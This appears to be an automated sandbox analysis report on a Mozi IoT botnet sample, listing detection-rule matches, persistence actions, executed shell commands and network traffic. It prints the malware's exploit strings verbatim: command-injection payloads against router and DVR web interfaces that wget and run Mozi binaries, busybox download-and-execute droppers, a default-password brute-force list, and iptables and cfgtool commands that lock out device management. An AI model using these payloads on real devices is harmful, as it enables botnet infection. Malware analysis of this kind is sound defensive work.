Source: Mozi.m.3, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5220.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5222.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5242.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Sample contains strings that are potentially command strings
Source: Initial sample Potential command found: GET /c HTTP/1.0
Source: Initial sample Potential command found: GET %s HTTP/1.1
Source: Initial sample Potential command found: GET /c
Source: Initial sample Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample Potential command found: GET /%s HTTP/1.1
Source: Initial sample Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
Sample contains strings indicative of password brute-forcing capabilities
Source: Initial sample String containing potential weak password found: admin
Source: Initial sample String containing potential weak password found: default
Source: Initial sample String containing potential weak password found: support
Source: Initial sample String containing potential weak password found: service
Source: Initial sample String containing potential weak password found: supervisor
Source: Initial sample String containing potential weak password found: guest
Source: Initial sample String containing potential weak password found: administrator
Source: Initial sample String containing potential weak password found: 123456
Source: Initial sample String containing potential weak password found: 54321
Source: Initial sample String containing potential weak password found: password
Source: Initial sample String containing potential weak password found: 12345
Source: Initial sample String containing potential weak password found: admin1234
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: busybox
Source: Initial sample String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|more
Source: Initial sample String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
Source: classification engine Classification label: mal100.spre.troj.evad.lin3@0/486@5/0

Persistence and Installation Behavior
barindex
Sample tries to persist itself using System V runlevels
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/rcS.d/S95baby.sh Jump to behavior
Sample tries to persist itself using /etc/profile
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/cedilla-portuguese.sh Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/im-config_wayland.sh Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/gawk.sh Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/01-locale-fix.sh Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/apps-bin-path.sh Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/Z99-cloudinit-warnings.sh Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/vte-2.91.sh Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/Z97-byobu.sh Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/Z99-cloud-locale-test.sh Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/xdg_dirs_desktop_session.sh Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/profile.d/bash_completion.sh Jump to behavior
Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /tmp/Mozi.m.3 (PID: 5224) File: /proc/5224/mounts Jump to behavior
Terminates several processes with shell command 'killall'
Source: /bin/sh (PID: 5229) Killall command executed: killall -9 telnetd utelnetd scfgmgr Jump to behavior
Writes ELF files to disk
Source: /tmp/Mozi.m.3 (PID: 5224) File written: /usr/networks Jump to dropped file
Writes shell script files to disk
Source: /tmp/Mozi.m.3 (PID: 5224) Shell script file created: /etc/rcS.d/S95baby.sh Jump to dropped file
Source: /tmp/Mozi.m.3 (PID: 5224) Shell script file created: /etc/init.d/S95baby.sh Jump to dropped file
Reads system information from the proc file system
Source: /tmp/Mozi.m.3 (PID: 5238) Reads from proc file: /proc/stat Jump to behavior
Enumerates processes within the "proc" file system
Source: /usr/bin/killall (PID: 5229) File opened: /proc/5145/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1582/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/3088/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/230/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/110/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/231/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/111/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/232/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1579/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/112/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/233/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1699/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/113/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/234/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1335/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1698/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/114/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/235/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1334/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1576/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/2302/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/115/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/236/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/116/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/237/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/117/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/118/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/910/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/119/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/912/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/10/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/2307/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/11/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/918/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/12/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/5152/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/13/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/14/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/15/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/5155/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/16/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/17/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/18/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1594/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/120/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/121/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1349/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/122/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/243/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/123/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/2/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/124/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/3/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/4/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/125/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/126/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1344/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1465/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1586/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/127/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/6/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/248/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/128/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/249/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1463/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/800/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/9/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/801/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/20/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/21/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1900/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/22/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/23/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/24/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/25/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/26/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/27/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/28/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/29/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/491/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/250/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/130/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/251/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/252/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/132/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/253/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/254/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/255/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/256/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1599/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/257/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1477/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/379/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/258/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1476/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/259/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1475/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/5039/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/936/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/30/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/2208/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/35/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1809/stat Jump to behavior
Source: /usr/bin/killall (PID: 5229) File opened: /proc/1494/stat Jump to behavior
Sample tries to set the executable flag
Source: /tmp/Mozi.m.3 (PID: 5224) File: /usr/networks (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Executes commands using a shell command-line interpreter
Source: /tmp/Mozi.m.3 (PID: 5226) Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5251) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 41039 -j ACCEPT" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5260) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 41039 -j ACCEPT" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5263) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 41039 -j ACCEPT" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5268) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 41039 -j ACCEPT" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5271) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 41039 -j ACCEPT" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5274) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 41039 -j ACCEPT" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5277) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 41039 -j ACCEPT" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5280) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 41039 -j ACCEPT" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5285) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5288) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5291) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5294) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5297) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\"" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5299) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\"" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5301) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5304) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5307) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5310) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5313) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5316) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5319) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5322) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5325) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5328) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5332) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5335) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5347) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5350) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5353) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5356) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5359) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 4000 -j ACCEPT" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5362) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5365) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT" Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5368) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT" Jump to behavior
Source: submitted sample Stderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705qemu: uncaught target signal 4 (Illegal instruction) - core dumpedUnsupported ioctl: cmd=0xffffffff80045705: exit code = 0

Hooking and other Techniques for Hiding and Protection
barindex
Drops files in suspicious directories
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/init.d/S95baby.sh Jump to dropped file
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/init.d/keyboard-setup.sh Jump to dropped file
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/init.d/console-setup.sh Jump to dropped file
Source: /tmp/Mozi.m.3 (PID: 5224) File: /etc/init.d/hwclock.sh Jump to dropped file
Source: /tmp/Mozi.m.3 (PID: 5224) File: /usr/bin/gettext.sh Jump to dropped file
Source: /tmp/Mozi.m.3 (PID: 5224) File: /usr/bin/rescan-scsi-bus.sh Jump to dropped file
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 32814 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 35686 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 81 -> 35686
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81

Malware Analysis System Evasion
barindex
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/Mozi.m.3 (PID: 5220) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224) Queries kernel information via 'uname': Jump to behavior
